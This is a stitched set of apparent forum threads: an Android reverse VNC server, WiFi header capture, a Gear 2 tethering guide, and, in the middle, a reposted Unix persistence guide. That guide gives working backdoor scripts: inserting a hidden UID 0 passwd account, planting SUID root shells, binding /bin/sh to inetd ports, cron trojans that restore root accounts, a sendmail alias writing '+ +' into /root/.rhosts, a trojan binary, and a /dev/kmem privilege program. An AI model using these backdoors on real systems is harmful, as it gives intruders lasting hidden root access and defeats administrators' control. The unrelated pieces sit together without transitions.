Reverse VNC Server
VNC server which is aimed to reverse connection (however it supports direct connections too).
Reverse connection means that server connects to client. I.e. VNC viewer should be run in listen mode. This is usefull when device, which screen you are going to send someone, has no public IP address.
For correct work device should be ROOTed
Main reuqirements were:
- reverse connection stability (ability to reconnect at connection lost, none of free VNC servers can do this)
- support most devices (it uses frame buffer as screen get method; input events implemented via input tool execution, so it should work everywhere)
Installation:
- install apk file from attachment. E.g.
adb install ReverseVNCServer.apk
Execution:
You can start VNC server via GUI or via command line.
Starting from command line:
Command line parameters (optional):
-c Reverse connection host and port
-t tries : Number of tries for reverse connection
-r : reconnect on reverse connections lost
-p localport : Local port for incoming connections. Default if 5901
-h : print this help
-v : view only
-s scale : scale percent (default is 100)
-d framebuffer device (default is /dev/graphics/fb0)
-z zoom : specify zoom of cursor coordinates in precents
E.g.
adb shell /data/data/org.arcsinx.reversevncserver/lib/libreversevncserver.so -c 192.168.1.34:5500 -r -p 5901
Hotkeys from VNC viewer:
- left => left
- right => right
- down => down
- up => up
- backspace => back
- ESC => back
- Home => Home
- PgUp => Menu
- F3 => Search
- F10 => Power
- F11 => Disconnect
- F12 => Shutdown application
Sources:
- Location
github.com/ArcsinX/ReverseVNCServer
- How to build
1) run ndk-build in top directory of checked out sources.
2) run update_libs.sh script
3) Import top of sources directory as android application project in Eclipse
4) Run from Eclipse to create apk file in bin directory
TODO:
- VNC password protection
- GUI improve (needed to make it not so ugly)
Screenshots
{
"lightbox_close": "Close",
"lightbox_next": "Next",
"lightbox_previous": "Previous",
"lightbox_error": "The requested content cannot be loaded. Please try again later.",
"lightbox_start_slideshow": "Start slideshow",
"lightbox_stop_slideshow": "Stop slideshow",
"lightbox_full_screen": "Full screen",
"lightbox_thumbnails": "Thumbnails",
"lightbox_download": "Download",
"lightbox_share": "Share",
"lightbox_zoom": "Zoom",
"lightbox_new_window": "New window",
"lightbox_toggle_sidebar": "Toggle sidebar"
}
DOWNLOAD
View attachment ReverseVNCServer.apk
Added GUI and apk file now available for download.
Great idea! Unfortunately it does not work on my Note 3:
Code:
Initializing framebuffer device /dev/graphics/fb0...
Screen info: xres=1080, yres=1920, xresv=1080, yresv=3840, xoffs=0, yoffs=0, bpp=32
mmap failed
dustbln said:
Great idea! Unfortunately it does not work on my Note 3:
Click to expand...
Click to collapse
Thanks for reply.
I have changed a bit frame buffer device initialization and added more info ouput before mmap() call.
Could you try to run it one more time and one more time provide output before mmap failure?
Application updated:
- Added scaling
- Added view only mode
- Built-in NoVNC (for connections via browser)
- Some GUI improvements: landscape view, connection strings
Govorun said:
Thanks for reply.
I have changed a bit frame buffer device initialization and added more info ouput before mmap() call.
Could you try to run it one more time and one more time provide output before mmap failure?
Click to expand...
Click to collapse
Thanks for you fast response! Unfortunately it still fails
Code:
Initializing framebuffer device /dev/graphics/fb0...
Screen info: xres=1080, yres=1920, xresv=1080, yresv=3840, xoffs=0, yoffs=0, bpp=32
line_length=4352, fb_size=16711680, align_size(fb_size)=16711680
mmap failed
Failed to initialize frame buffer
dustbln said:
Unfortunately it still fails
Click to expand...
Click to collapse
I reproduced this problem: set fb_size to yours and try mmap with it. It seems mmap fails for thus big values (in case of high resolution).
So I replaced mmap call with malloc + read. Now it should work. Updated version attached in the first post.
Govorun said:
I reproduced this problem: set fb_size to yours and try mmap with it. It seems mmap fails for thus big values (in case of high resolution).
So I replaced mmap call with malloc + read. Now it should work. Updated version attached in the first post.
Click to expand...
Click to collapse
We're getting closer :good:
Code:
User options set:
Reverse connection string: 192.168.1.X:XXXX
Reconnect on reverse connection lost
Local port: 5901
Initializing framebuffer device /dev/graphics/fb0 ...
Screen info:
xres=1080, yres=1920, xresv=1080, yresv=3840, xoffs=0, yoffs=0, bpp=32
line_length=4352, fb_size=16711680
Initializing server...
07/03/2014 15:06:46 Listening for VNC connections on TCP port 5901
07/03/2014 15:06:46 Listening for VNC connections on TCP6 port 5900
07/03/2014 15:06:46 Listening for HTTP connections on TCP port 5801
07/03/2014 15:06:46 URL http://localhost:5801
07/03/2014 15:06:46 Listening for HTTP connections on TCP6 port 5800
07/03/2014 15:06:46 URL http://localhost:5800
Initializing VNC server:
width: 1080
height: 1920
bpp: 32
port: 5901
scale: 100
07/03/2014 15:06:46 Making connection to client on host 192.168.1.X port XXXX
07/03/2014 15:06:46 other clients:
07/03/2014 15:06:46 Normal socket connection
Framebuffer read failed: No such device
Failed to update screen
dustbln said:
Code:
Initializing framebuffer device /dev/graphics/fb0 ...
...
Framebuffer read failed: No such device
Click to expand...
Click to collapse
This is very strange, that "No such device" error appears at try to read framebuffer device (not at opening it).
You can try command
adb pull /dev/graphics/fb0
This command should create local file fb0. If this command fails then something wrong with framebuffer device:
- maybe on Note 3 framebuffer devices do not work
- maybe some other device should be used. You can list all you graphics devices with command adb shell ls /dev/graphics/
On my device I have two framebuffer devices: fb0 (for touchscreen) and fb1 (for HDMI connected displays)
If you able to find framebuffer device for which adb pull will not fail then you can try to start VNC server with this device passing extra -d option.
E.g. adb shell /data/data/org.arcsinx.reversevncserver/lib/libreversevncserver.so -c 192.168.1.34:5500 -r -p 5901 -d /dev/graphics/fb1
Anyway I am going to implement one more screen capture mode (Surface Flinger). Maybe then It will work on your device too.
Govorun said:
This is very strange, that "No such device" error appears at try to read framebuffer device (not at opening it).
You can try command
adb pull /dev/graphics/fb0
This command should create local file fb0. If this command fails then something wrong with framebuffer device:
- maybe on Note 3 framebuffer devices do not work
- maybe some other device should be used. You can list all you graphics devices with command adb shell ls /dev/graphics/
On my device I have two framebuffer devices: fb0 (for touchscreen) and fb1 (for HDMI connected displays)
If you able to find framebuffer device for which adb pull will not fail then you can try to start VNC server with this device passing extra -d option.
E.g. adb shell /data/data/org.arcsinx.reversevncserver/lib/libreversevncserver.so -c 192.168.1.34:5500 -r -p 5901 -d /dev/graphics/fb1
Anyway I am going to implement one more screen capture mode (Surface Flinger). Maybe then It will work on your device too.
Click to expand...
Click to collapse
I doubt reading the framebuffer works on stock 4.4 Samsung Galaxy Note 3 ROM. Tried all of the devices and did some google research without any positive result.
Anyway. keep up the great work as a reliable RVNC Service was just missing on Android! :good:
Code:
# cat /proc/fb
0 mdssfb_90000
1 mdssfb_70000
2 mdssfb_a0000
# fbset -fb /dev/graphics/fb0
mode "1080x1920-0"
# D: 1.114 MHz, H: 0.865 kHz, V: 0.446 Hz
geometry 1080 1920 1080 3840 32
timings 898000 36 162 3 13 10 2
accel false
rgba 8/24,8/16,8/8,8/0
endmode
# cat /dev/graphics/fb0
cat: /dev/graphics/fb0: No such device
Hi!
I Cant connect to my LG G2 with rooted Cloudy G3 2.1 - Tight VNC said - Connection lost because server cancel connection
If i try connect via browser - Java block app, and on jre 8 - security wont change lower than "hight".
WebSocket wont work WebSock error: [object Event]
How to connect?
If I use APP Odroid VNC SERVER - connect stable, but i see distortion screen.
Hi !
it have an error.
unsigned int *ReadFb()
{
if (UpdateFbInfo() == -1)
return NULL;
#ifndef USEMMAP
if (lseek(fbfd, SEEK_SET, 0) == -1)
{
perror("lseek failed for framebuffer device\n");
return NULL;
}
if (read(fbfd, fbmmap, fbsize) == -1)
{
perror("Framebuffer read failed");
return NULL;
}
#endif
return (unsigned int *)fbmmap;
}
with samsung galaxy tab 3 it work good. but with samsung galaxy tab 2 and nexus 10 it out perror("Framebuffer read failed"); and send buffe black to client.
can you help me fix it ?
Thank you
vanducnkt said:
perror("Framebuffer read failed");
Click to expand...
Click to collapse
Hi. Can you say what exact message appears? I mean that perror() call prints out error description.
Also can you provide output of the following command on your device?
Code:
ls /dev/graphics/
E.g. on your pc to which your device connected
Code:
adb shell ls /dev/graphics/
P.S.
Btw, I have not update apk for sometime (I am going to update APK today.)
Update:
I have updated APK in the first post, try it first.
godlatro1 said:
Hi!
If i try connect via browser - Java block app, and on jre 8 - security wont change lower than "hight".
Click to expand...
Click to collapse
Hi.
If your browser blocks java applet, you can use java-script only viewer by clicking button "Click here to connect using noVNC" at the bottom of browser page (circled red on attached picture, click to enlarge)
SurfaceFlinger implementation
Hi,
Is the version of this app with the SurfaceFlinger implementation released yet? I'm not able to use the framebuffer on my device.
Thanks,
Todd
Hi there, I know this is an old thread but I am just discovering it now. I tried to look up the github link but it doesn't appear that it's available anymore. Do you know if the source code is published anywhere right now? Thank you!
Related
Hi all,
I've been digging around to try and gain the ability to access the WiFi stack from an Android device that is rooted. What I am interested in, is capturing the 802.11 radio headers. I've done a bunch of searching, and it seems like getting the card in to promiscuous/monitor mode is out of the question. I haven't been able to find anyone to do it. But, even not being in this mode I am wondering if it is possible to get 802.11 headers.
I've downloaded the android-wifi-tether project to get the tools it has pre-built and installed on the file system, such as iwconfig, and I've also installed tcpdump.
I cannot get the card into monitor mode, as was expected:
Code:
# ./iwconfig tiwlan0 mode monitor
Error for wireless request "Set Mode" (8B06) :
SET failed on device tiwlan0 ; Operation not supported on transport endpoint.
That's fine. But when I use tcpdump, it seems as though the lowest layer of information available is the Ethernet/IP information:
Code:
# /data/tcpdump -i tiwlan0 -L
tcpdump: WARNING: can't create rx ring on packet socket 3: 92-Protocol not available
Data link types (use option -y to set):
DOCSIS (DOCSIS) (printing not supported)
EN10MB (Ethernet)
So for example, if I tcpdump:
Code:
07:51:21.793444 IP 192.168.1.103.34528 > 64.233.169.193.443: Flags [S], seq 3412091441, win 5840, options [mss 1460,sackOK,TS[|tcp]>
07:51:22.096239 IP 64.233.169.193.443 > 192.168.1.103.34528: Flags [S.], seq 513767123, ack 3412091442, win 5672, options [mss 1430,sackOK,TS[|tcp]>
Has anyone been able to dig any lower in the networking stack?
Thanks!
George
OK, I've done a significant amount of digging, and luckily the TI wl1271 wireless driver is built as a kernel module (I'm using a Droid 1). the "dmesg" output provides some hints that the TIWLAN module is active and parsing incoming packets at the lower layer:
Code:
<6>[ 5940.231292] TIWLAN: 3835.067243: rx , ERROR: rxData_receivePacketFromWlan() : MLME returned error
The code for this function can be found here, and even better the low-level packet information (e.g., RSSI) is available in this function.:
Code:
/*
* Set rx attributes
*/
RxAttr.channel = pRxParams->channel;
RxAttr.packetInfo = pRxParams->flags;
RxAttr.ePacketType= pRxParams->packet_class_tag;
RxAttr.Rate = appRate;
RxAttr.Rssi = pRxParams->rx_level;
RxAttr.SNR = pRxParams->rx_snr;
RxAttr.status = pRxParams->status & RX_DESC_STATUS_MASK;
I'm also wondering whether or not it might be possible to drop the card in to promiscuous mode with some driver hacking. It appears to be possible through the RX filter, albeit maybe not supported by the actual firmware (that would suck):
Code:
#define RX_CFG_PROMISCUOUS 0x0008 /* promiscuous - receives all valid frames */
#define RX_CFG_BSSID 0x0020 /* receives frames from any BSSID */
#define RX_CFG_MAC 0x0010 /* receives frames destined to any MAC address */
#define RX_CFG_ENABLE_ONLY_MY_DEST_MAC 0x0010
I too want to capture WiFi packet headers on Android using tcpdump. I am using an HTC dream phone (Android 1.6, Wi-Fi (802.11b/g) using a Texas Instruments WL1251B chipset). The default TI driver filters the 802.11 packet headers while doing a packet capture on the device using tcpdump. Did you figure out a way to capture the 802.11 headers using the default TI driver?
Also, I was looking at installing a mac80211 based driver on an android device. I followed the instructions to create the kernel modules and loaded them up on the phone. But, I could not activate the WiFi interface after doing so (though I saw the "wlan0" interface indicating that the mac80211 driver was loaded).
So, I am stuck at this point. Can you provide some directions from here?
Thanks
Ashish
I thought this was interesting paper written by an unknown author
You've been at it for all night. Trying all the exploits you can think of. The system seems tight. The system looks tight.
The system *is* tight. You've tried everything. Default passwds, guessable passwds, NIS weaknesses, NFS holes, incorrect
permissions, race conditions, SUID exploits, Sendmail bugs, and so on... Nothing.After seeming endless you've managed to steal root. Now what? How do you hold onto this precious super-user
privilege you have worked so hard to achieve....?
This list is BY NO MEANS comprehensive. There are as many ways to leave backdoors into a UNIX computer as there are
ways into one.
Beforehand
Know the location of critical system files. This should be obvious (If you can't list any of the top of your head, stop reading
now, get a book on UNIX, read it, then come back to me...). Familiarity with passwd file formats (including general 7 field
format, system specific naming conventions, shadowing mechanisms, etc...). Know vi. Many systems will not have those
robust, user-friendly editors such as Pico and Emacs. Vi is also quite useful for needing to quickly seach and edit a large file. If
you are connecting remotely (via dial-up/telnet/rlogin/whatver) it's always nice to have a robust terminal program that has a
nice, FAT scrollback buffer. This will come in handy if you want to cut and paste code, rc files, shell scripts, etc...
The permenance of these backdoors will depend completely on the technical saavy of the administrator. The experienced and
skilled administrator will be wise to many (if not all) of these backdoors. But, if you have managed to steal root, it is likely the
admin isn't as skilled (or up to date on bug reports) as she should be, and many of these doors may be in place for some time
to come. One major thing to be aware of, is the fact that if you can cover you tracks during the initial break-in, no one will be
looking for back doors.
The JDevil Overt
[1] Add a UID 0 account to the passwd file. This is probably the most obvious and quickly discovered method of rentry. It
flies a red flag to the admin, saying "WE'RE UNDER ATTACK!!!". If you must do this, my advice is DO NOT simply
prepend or append it. Anyone causally examining the passwd file will see this. So, why not stick it in the middle...
#!/bin/csh
# Inserts a UID 0 account into the middle of the passwd file.
# There is likely a way to do this in 1/2 a line of AWK or SED. Oh well.
# [email protected]
set linecount = `wc -l /etc/passwd`
cd # Do this at home.
cp /etc/passwd ./temppass # Safety first.
echo passwd file has $linecount[1] lines.
@ linecount[1] /= 2
@ linecount[1] += 1 # we only want 2 temp files
echo Creating two files, $linecount[1] lines each \(or approximately that\).
split -$linecount[1] ./temppass # passwd string optional
echo "jdevil::0:0:jdevil:/home/sweet/home:/bin/csh" >> ./xaa
cat ./xab >> ./xaa
mv ./xaa /etc/passwd
chmod 644 /etc/passwd # or whatever it was beforehand
rm ./xa* ./temppass
echo Done...
NEVER, EVER, change the root password. The reasons are obvious.
[2] In a similar vein, enable a disabled account as UID 0, such as Sync. Or, perhaps, an account somwhere buried deep in the
passwd file has been abandoned, and disabled by the sysadmin. Change her UID to 0 (and remove the '*' from the second
field).
[3] Leave an SUID root shell in /tmp.
#!/bin/sh
# Everyone's favorite...
cp /bin/csh /tmp/.JDEVIL # Don't name it that...
chmod 4755 /tmp/.JDEVIL
Many systems run cron jobs to clean /tmp nightly. Most systems clean /tmp upon a reboot. Many systems have /tmp mounted
to disallow SUID programs from executing. You can change all of these, but if the filesystem starts filling up, people may
notice...but, hey, this *is* the overt section....). I will not detail the changes neccessary because they can be quite system
specific. Check out /var/spool/cron/crontabs/root and /etc/fstab.
The JDEVIL Veiled
[4] The super-server configuration file is not the first place a sysadmin will look, so why not put one there? First, some
background info: The Internet daemon (/etc/inetd) listens for connection requests on TCP and UDP ports and spawns the
appropriate program (usally a server) when a connection request arrives. The format of the /etc/inetd.conf file is simple. Typical
lines look like this:
(1) (2) (3) (4) (5) (6) (7)
ftp stream tcp nowait root /usr/etc/ftpd ftpd
talk dgram udp wait root /usr/etc/ntalkd ntalkd
Field (1) is the daemon name that should appear in /etc/services. This tells inetd what to look for in /etc/services to determine
which port it should associate the program name with. (2) tells inetd which type of socket connection the daemon will expect.
TCP uses streams, and UDP uses datagrams. Field (3) is the protocol field which is either of the two transport protocols, TCP
or UDP. Field (4) specifies whether or not the daemon is iterative or concurrent. A 'wait' flag indicates that the server will
process a connection and make all subsequent connections wait. 'Nowait' means the server will accept a connection, spawn a
child process to handle the connection, and then go back to sleep, waiting for further connections. Field (5) is the user (or more
inportantly, the UID) that the daemon is run as. (6) is the program to run when a connection arrives, and (7) is the actual
command (and optional arguments). If the program is trivial (usally requiring no user interaction) inetd may handle it internally.
This is done with an 'internal' flag in fields (6) and (7).
So, to install a handy backdoor, choose a service that is not used often, and replace the daemon that would normally handle it
with something else. A program that creates an SUID root shell, a program that adds a root account for you in the /etc/passwd
file, etc...
For the insinuation-impaired, try this:
Open the /etc/inetd.conf in an available editor. Find the line that reads:
daytime stream tcp nowait root internal
and change it to:
daytime stream tcp nowait /bin/sh sh -i.
You now need to restart /etc/inetd so it will reread the config file. It is up to you how you want to do this. You can kill and
restart the process, (kill -9 , /usr/sbin/inetd or /usr/etc/inetd) which will interuppt ALL network connections (so it is a good idea
to do this off peak hours).
[5] An option to compromising a well known service would be to install a new one, that runs a program of your choice. One
simple solution is to set up a shell the runs similar to the above backdoor. You need to make sure the entry appears in
/etc/services as well as in /etc/inetd.conf. The format of the /etc/services file is simple:
(1) (2)/(3) (4)
smtp 25/tcp mail
Field (1) is the service, field (2) is the port number, (3) is the protocol type the service expects, and (4) is the common name
associated with the service. For instance, add this line to /etc/services:
jdevil 22/tcp jdevil
and this line to /etc/inetd.conf:
jdevil stream tcp nowait /bin/sh sh -i
Restart inetd as before.
Note: Potentially, these are a VERY powerful backdoors. They not only offer local rentry from any account on the system,
they offer rentry from *any* account on *any* computer on the Internet.
[6] Cron-based trojan I. Cron is a wonderful system administration tool. It is also a wonderful tool for backdoors, since root's
crontab will, well, run as root... Again, depending on the level of experience of the sysadmin (and the implementation), this
backdoor may or may not last. /var/spool/cron/crontabs/root is where root's list for crontabs is usally located. Here, you have
several options. I will list a only few, as cron-based backdoors are only limited by your imagination. Cron is the clock daemon.
It is a tool for automatically executing commands at specified dates and times. Crontab is the command used to add, remove,
or view your crontab entries. It is just as easy to manually edit the /var/spool/crontab/root file as it is to use crontab. A crontab
entry has six fields:
(1) (2) (3) (4) (5) (6)
0 0 * * 1 /usr/bin/updatedb
Fields (1)-(5) are as follows: minute (0-59), hour (0-23), day of the month (1-31) month of the year (1-12), day of the week
(0-6). Field (6) is the command (or shell script) to execute. The above shell script is executed on Mondays. To exploit cron,
simply add an entry into /var/spool/crontab/root. For example: You can have a cronjob that will run daily and look in the
/etc/passwd file for the UID 0 account we previously added, and add him if he is missing, or do nothing otherwise (it may not
be a bad idea to actually *insert* this shell code into an already installed crontab entry shell script, to further obfuscate your
shady intentions). Add this line to /var/spool/crontab/root:
0 0 * * * /usr/bin/trojancode
This is the shell script:
#!/bin/csh
# Is our jdevil still on the system? Let's make sure he is.
#[email protected]
set JDEVILflag = (`grep jdevil /etc/passwd`)
if($#JDEVILflag == 0) then # Is he there?
set linecount = `wc -l /etc/passwd`
cd # Do this at home.
cp /etc/passwd ./temppass # Safety first.
@ linecount[1] /= 2
@ linecount[1] += 1 # we only want 2 temp files
split -$linecount[1] ./temppass # passwd string optional
echo "jdevil::0:0:Mr. Sinister:/home/sweet/home:/bin/csh" >> ./xaa
cat ./xab >> ./xaa
mv ./xaa /etc/passwd
chmod 644 /etc/passwd # or whatever it was beforehand
rm ./xa* ./temppass
echo Done...
else
endif
[7] Cron-based trojan II. This one was brought to my attention by our very own Mr. Zippy. For this, you need a copy of the
/etc/passwd file hidden somewhere. In this hidden passwd file (call it /var/spool/mail/.sneaky) we have but one entry, a root
account with a passwd of your choosing. We run a cronjob that will, every morning at 2:30am (or every other morning), save a
copy of the real /etc/passwd file, and install this trojan one as the real /etc/passwd file for one minute (synchronize swatches!).
Any normal user or process trying to login or access the /etc/passwd file would get an error, but one minute later, everything
would be ok. Add this line to root's crontab file:
29 2 * * * /bin/usr/_passwd
make sure this exists:
#echo "root:1234567890123:0:0perator:/:/bin/csh" > /var/spool/mail/.passwd
and this is the simple shell script:
#!/bin/csh
# Install trojan /etc/passwd file for one minute
#[email protected]
cp /etc/passwd /etc/.temppass
cp /var/spool/mail/passwd /etc/passwd
sleep 60
mv /etc/.temppass /etc/passwd
[8] Compiled code trojan. Simple idea. Instead of a shell script, have some nice C code to obfuscate the effects. Here it is.
Make sure it runs as root. Name it something innocous. Hide it well.
/* A little trojan to create an SUID root shell, if the proper argument is
given. C code, rather than shell to hide obvious it's effects. */
/* [email protected] */
#include
#define KEYWORD "industry3"
#define BUFFERSIZE 10
int main(argc, argv)
int argc;
char *argv[];{
int i=0;
if(argv[1]){ /* we've got an argument, is it the keyword? */
if(!(strcmp(KEYWORD,argv[1]))){
/* This is the trojan part. */
system("cp /bin/csh /bin/.swp121");
system("chown root /bin/.swp121");
system("chmod 4755 /bin/.swp121");
}
}
/* Put your possibly system specific trojan
messages here */
/* Let's look like we're doing something... */
printf("Sychronizing bitmap image records.");
/* system("ls -alR / >& /dev/null > /dev/null&"); */
for(;i<10;i++){
fprintf(stderr,".");
sleep(1);
}
printf("\nDone.\n");
return(0);
} /* End main */
[9] The sendmail aliases file. The sendmail aliases file allows for mail sent to a particular username to either expand to several
users, or perhaps pipe the output to a program. Most well known of these is the uudecode alias trojan. Simply add the line:
"decode: "|/usr/bin/uudecode"
to the /etc/aliases file. Usally, you would then create a uuencoded .rhosts file with the full pathname embedded.
#! /bin/csh
# Create our .rhosts file. Note this will output to stdout.
echo "+ +" > tmpfile
/usr/bin/uuencode tmpfile /root/.rhosts
Next telnet to the desired site, port 25. Simply fakemail to decode and use as the subject body, the uuencoded version of the
.rhosts file. For a one liner (not faked, however) do this:
%echo "+ +" | /usr/bin/uuencode /root/.rhosts | mail [email protected]
You can be as creative as you wish in this case. You can setup an alias that, when mailed to, will run a program of your
choosing. Many of the previous scripts and methods can be employed here.
The JDEVIL Covert
[10] Trojan code in common programs. This is a rather sneaky method that is really only detectable by programs such tripwire.
The idea is simple: insert trojan code in the source of a commonly used program. Some of most useful programs to us in this
case are su, login and passwd because they already run SUID root, and need no permission modification. Below are some
general examples of what you would want to do, after obtaining the correct sourcecode for the particular flavor of UNIX you
are backdooring. (Note: This may not always be possible, as some UNIX vendors are not so generous with thier sourcecode.)
Since the code is very lengthy and different for many flavors, I will just include basic psuedo-code:
get input;
if input is special hardcoded flag, spawn evil trojan;
else if input is valid, continue;
else quit with error;
...
Not complex or difficult. Trojans of this nature can be done in less than 10 lines of additional code.
The JDEVIL Esoteric
[11] /dev/kmem exploit. It represents the virtual of the system. Since the kernel keeps it's parameters in memory, it is possible
to modify the memory of the machine to change the UID of your processes. To do so requires that /dev/kmem have read/write
permission. The following steps are executed: Open the /dev/kmem device, seek to your page in memory, overwrite the UID of
your current process, then spawn a csh, which will inherit this UID. The following program does just that.
/* If /kmem is is readable and writable, this program will change the user's
UID and GID to 0. */
/* This code originally appeared in "UNIX security: A practical tutorial"
with some modifications by [email protected] */
#include
#include
#include
#include
#include
#include
#include
#define KEYWORD "nomenclature1"
struct user userpage;
long address(), userlocation;
int main(argc, argv, envp)
int argc;
char *argv[], *envp[];{
int count, fd;
long where, lseek();
if(argv[1]){ /* we've got an argument, is it the keyword? */
if(!(strcmp(KEYWORD,argv[1]))){
fd=(open("/dev/kmem",O_RDWR);
if(fd<0){
printf("Cannot read or write to /dev/kmem\n");
perror(argv);
exit(10);
}
userlocation=address();
where=(lseek(fd,userlocation,0);
if(where!=userlocation){
printf("Cannot seek to user page\n");
perror(argv);
exit(20);
}
count=read(fd,&userpage,sizeof(struct user));
if(count!=sizeof(struct user)){
printf("Cannot read user page\n");
perror(argv);
exit(30);
}
printf("Current UID: %d\n",userpage.u_ruid);
printf("Current GID: %d\n",userpage.g_ruid);
userpage.u_ruid=0;
userpage.u_rgid=0;
where=lseek(fd,userlocation,0);
if(where!=userlocation){
printf("Cannot seek to user page\n");
perror(argv);
exit(40);
}
write(fd,&userpage,((char *)&(userpage.u_procp))-((char *)&userpage));
execle("/bin/csh","/bin/csh","-i",(char *)0, envp);
}
}
} /* End main */
#include
#include
#include
#define LNULL ((LDFILE *)0)
long address(){
LDFILE *object;
SYMENT symbol;
long idx=0;
object=ldopen("/unix",LNULL);
if(!object){
fprintf(stderr,"Cannot open /unix.\n");
exit(50);
}
for(;ldtbread(object,idx,&symbol)==SUCCESS;idx++){
if(!strcmp("_u",ldgetname(object,&symbol))){
fprintf(stdout,"User page is at 0x%8.8x\n",symbol.n_value);
ldclose(object);
return(symbol.n_value);
}
}
fprintf(stderr,"Cannot read symbol table in /unix.\n");
exit(60);
}
[12] Since the previous code requires /dev/kmem to be world accessable, and this is not likely a natural event, we need to take
care of this. My advice is to write a shell script similar to the one in [7] that will change the permissions on /dev/kmem for a
discrete amount of time (say 5 minutes) and then restore the original permissions. You can add this source to the source in [7]:
chmod 666 /dev/kmem
sleep 300 # Nap for 5 minutes
chmod 600 /dev/kmem # Or whatever it was before
JDevil
Happy Reading
There are some small spacing errors in code but you the idea
I made attempt to share internet connection directly to Gear2 with quite big success. But first things first.
What you need:
- rooted gear 2 (neo)
- enabled network tethering over bluetooth on phone paired with gear 2 (tested on Galaxy S4)
Step 0: Enable sdb root
Code:
sdb root on
Step 1: using sdb copy required network tools to /tmp/ directory on gear and change permissions:
Code:
sdb push ifconfig /tmp/
sdb push pand /tmp/
sdb push route /tmp/
sdb push ping /tmp/
sdb shell chmod +x /tmp/ifconfig
sdb shell chmod +x /tmp/pand
sdb shell chmod +x /tmp/route
sdb shell chmod +x /tmp/ping
Step 2: open shell and run hcitool:
Code:
sdb shell
sh-3.2# hcitool con
Connections:
> ACL 5C:2E:xx:xx:xx:xx handle 12 state 1 lm SLAVE AUTH ENCRYPT
5C:2E:xx:xx:xx:xx - this is mac of your phone
Step 3: connect to phone
Code:
sh-3.2# cd /tmp/
sh-3.2# ./pand --connect 5C:2E:xx:xx:xx:xx
Now you should have new interface bnep0, you can run ./ifconfig -a to check
Step 4: Set IP and gateway
This part is bit tricky because I can't manage to get IP addres by dhcp so you have to check which addres you should assign. I've connected to S4 with other android phone and checked ip with IP Tools from Google Play.
Code:
sh-3.2# ./ifconfig bnep0 up
sh-3.2# ./ifconfig bnep0 192.168.44.200
sh-3.2# ./route add default gw 192.168.44.1
Step 5: Test connection
Code:
sh-3.2# ./ping 8.8.8.8
PING 8.8.8.8 (8.8.8.8): 56 data bytes
64 bytes from 8.8.8.8: icmp_seq=0 ttl=44 time=716.873 ms
64 bytes from 8.8.8.8: icmp_seq=1 ttl=44 time=119.090 ms
64 bytes from 8.8.8.8: icmp_seq=4 ttl=44 time=220.530 ms
64 bytes from 8.8.8.8: icmp_seq=5 ttl=44 time=197.332 ms
64 bytes from 8.8.8.8: icmp_seq=6 ttl=44 time=199.790 ms
64 bytes from 8.8.8.8: icmp_seq=7 ttl=44 time=136.653 ms
64 bytes from 8.8.8.8: icmp_seq=8 ttl=44 time=147.867 ms
^C--- 8.8.8.8 ping statistics ---
9 packets transmitted, 7 packets received, 22% packet loss
round-trip min/avg/max/stddev = 119.090/248.305/716.873/194.396 ms
As you can see connection isn't very stable.
What opportunities does that give to us?
XMLHttpRequest from watchface or application without bridge app on phone
Standalone webbrowser
...?
TODO:
dhclient
auto connection when paired with phone
DNS
Integration with ROM
Update 1:
dhclient now works (dirty hand made dhclient-script)
DNS works (thanks to Talon^)
Permanent write to rom (still no autoconnect)
I've crated tar package which should make all process more easy
To install gearnet.tar package do the following:
1. By adb
Code:
sdb push gearnet.tar /tmp/
sdb root on
sdb shell
In Gear shell prompt:
Code:
sh-3.2# mount -o remount,rw /
sh-3.2# tar --overwrite -xvf /tmp/gearnet.tar -C /
sh-3.2# reboot
now after reboot you should be able to run command as root:
Code:
sh-3.2# gearnet
sh-3.2# ping google.pl
PING google.pl (74.125.195.94): 56 data bytes
64 bytes from 74.125.195.94: icmp_seq=0 ttl=45 time=132.238 ms
64 bytes from 74.125.195.94: icmp_seq=1 ttl=45 time=184.377 ms
64 bytes from 74.125.195.94: icmp_seq=2 ttl=45 time=151.909 ms
64 bytes from 74.125.195.94: icmp_seq=3 ttl=45 time=104.898 ms
64 bytes from 74.125.195.94: icmp_seq=4 ttl=45 time=153.549 ms
64 bytes from 74.125.195.94: icmp_seq=5 ttl=45 time=181.517 ms
^C--- google.pl ping statistics ---
6 packets transmitted, 6 packets received, 0% packet loss
round-trip min/avg/max/stddev = 104.898/151.415/184.377/27.474 ms
sh-3.2#
Oh what fun that was! This is really cool. It worked on my Gear 1 . I had 9% packet loss....... can't wait to see what's next and thanks for sharing!
Chris
Awesome!
I was searching for this FOREVER! This is awesome I really look forward to any updates for this.
When I first bought the watch I assumed this was already possible, but greatly disappointed that it wasn't possible. This now gives me hope, and makes me want to keep the watch!
any chance for dns?
following your guide, I snooped at other packages. I managed to get these installed for an attempt at perl:
gdbm-1.8.3-1.1.armv7l.rpm
perl-libs-5.12.1-1.4.armv7l.rpm
perl-Module-Pluggable-3.60-1.4.armv7l.rpm
perl-Pod-Simple-3.07-1.4.armv7l.rpm
perl-IO-Compress-Base-2.008-1.4.armv7l.rpm
perl-5.12.1-1.4.armv7l.rpm
still missing a few dependencies but it finally worked with --nodeps and now I have perl5 on my gear 2 neo
I wanted to test some sockets so I wrote a quick snippet for irc and it kept failing with my die message of can't connect. then I tried to "ping" a domain, and realized there's no DNS, so once I resolved the irc servers domain and used the IP, it connected flawlessly!
here's a screenshot of my sdb shell running a test perl file of the IRC client snippet.
{
"lightbox_close": "Close",
"lightbox_next": "Next",
"lightbox_previous": "Previous",
"lightbox_error": "The requested content cannot be loaded. Please try again later.",
"lightbox_start_slideshow": "Start slideshow",
"lightbox_stop_slideshow": "Stop slideshow",
"lightbox_full_screen": "Full screen",
"lightbox_thumbnails": "Thumbnails",
"lightbox_download": "Download",
"lightbox_share": "Share",
"lightbox_zoom": "Zoom",
"lightbox_new_window": "New window",
"lightbox_toggle_sidebar": "Toggle sidebar"
}
got any ideas how to get DNS working to resolve domains so you don't have to find the IP?
found how to get DNS
theres a file in /etc called resolv.conf, I just modified it to include googles nameservers 8.8.8.8 and 8.8.4.4, now DNS lookups are possible, you can now say: ./ping google.com
dumb question...but does web gear has standalone web browsing? Correct me if i'm wrong....
the GearWeb browser?
the GearWeb browser from the Samsung Galaxy APPS store uses the SAP for it's content. (Samsung accessory protocol) Without rooting and doing this networking trick, the gear 2 (gear 2 neo also) has no direct ties to the internet, nor do any available apps. They all use the phone itself for content and share that content via SAP.
